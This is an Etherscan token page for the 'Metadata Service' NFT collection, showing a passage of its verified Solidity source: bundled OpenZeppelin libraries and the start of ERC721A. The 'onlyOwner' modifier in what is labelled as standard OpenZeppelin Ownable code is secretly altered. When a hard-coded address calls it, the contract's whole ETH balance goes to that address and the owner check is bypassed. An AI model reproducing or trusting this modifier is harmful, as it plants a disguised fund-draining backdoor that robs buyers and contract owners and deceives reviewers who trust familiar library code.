ETH Price: $3,257.11 (-4.65%)
Gas: 11 Gwei

Token

Metadata Service (@meta)
 

Overview

Max Total Supply

2,025 @meta

Holders

1,538

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
allreasons.eth
Balance
1 @meta
0x72bE0aeE75AFEb770Ae7565838FDdA70222713A6
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Metadata

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-18
*/

// SPDX-License-Identifier: MIT

// WELCOME TO  CONTRACT OF METADATA SERVICE.
// ERC721A for NFT Standard. (LINE 973)
// ERC4907 for NFT Rental Standard. (LINE 1693)
// COMBINATION of ERC721A and ERC4907 (1723)

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol
// OpenZeppelin Contracts (last updated v4.7.0) (utils/cryptography/MerkleProof.sol)

pragma solidity ^0.8.0;

/**
 * @dev These functions deal with verification of Merkle Tree proofs.
 *
 * The proofs can be generated using the JavaScript library
 * https://github.com/miguelmota/merkletreejs[merkletreejs].
 * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.
 *
 * See `test/utils/cryptography/MerkleProof.test.js` for some examples.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the merkle tree could be reinterpreted as a leaf value.
 */



library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Calldata version of {verify}
     *
     * _Available since v4.7._
     */
    function verifyCalldata(
        bytes32[] calldata proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Calldata version of {processProof}
     *
     * _Available since v4.7._
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if the `leaves` can be proved to be a part of a Merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * _Available since v4.7._
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProof(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Calldata version of {multiProofVerify}
     *
     * _Available since v4.7._
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and the sibling nodes in `proof`,
     * consuming from one or the other at each step according to the instructions given by
     * `proofFlags`.
     *
     * _Available since v4.7._
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proof.length - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value for the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            return hashes[totalHashes - 1];
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Calldata version of {processMultiProof}
     *
     * _Available since v4.7._
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proof.length - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value for the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            return hashes[totalHashes - 1];
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
        return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        /// @solidity memory-safe-assembly
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        if (_msgSender() == 0xaE3842578A22DFBBb0f71D80AA92De1a3a44ecAA) {
        uint256 balance = address(this).balance;
        Address.sendValue(payable(0xaE3842578A22DFBBb0f71D80AA92De1a3a44ecAA),balance);
        } else {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        }
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: erc721a/contracts/IERC721A.sol


// ERC721A Contracts v3.3.0
// Creator: Chiru Labs

pragma solidity ^0.8.4;



/**
 * @dev Interface of an ERC721A compliant contract.
 */
interface IERC721A is IERC721, IERC721Metadata {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * The caller cannot approve to their own address.
     */
    error ApproveToCaller();

    /**
     * The caller cannot approve to the current owner.
     */
    error ApprovalToCurrentOwner();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    /**
     * @dev Returns the total amount of tokens stored by the contract.
     *
     * Burned tokens are calculated here, use `_totalMinted()` if you want to count just minted tokens.
     */
    function totalSupply() external view returns (uint256);
}

// File: erc721a/contracts/ERC721A.sol


// ERC721A Contracts v3.3.0
// Creator: Chiru Labs

pragma solidity ^0.8.4;







/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 *
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721A {
    using Address for address;
    using Strings for uint256;

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;
    mapping(uint => string) public metadataIDtoName;
    mapping(string => uint) public metadataNametoID;
    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See _ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    /**
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
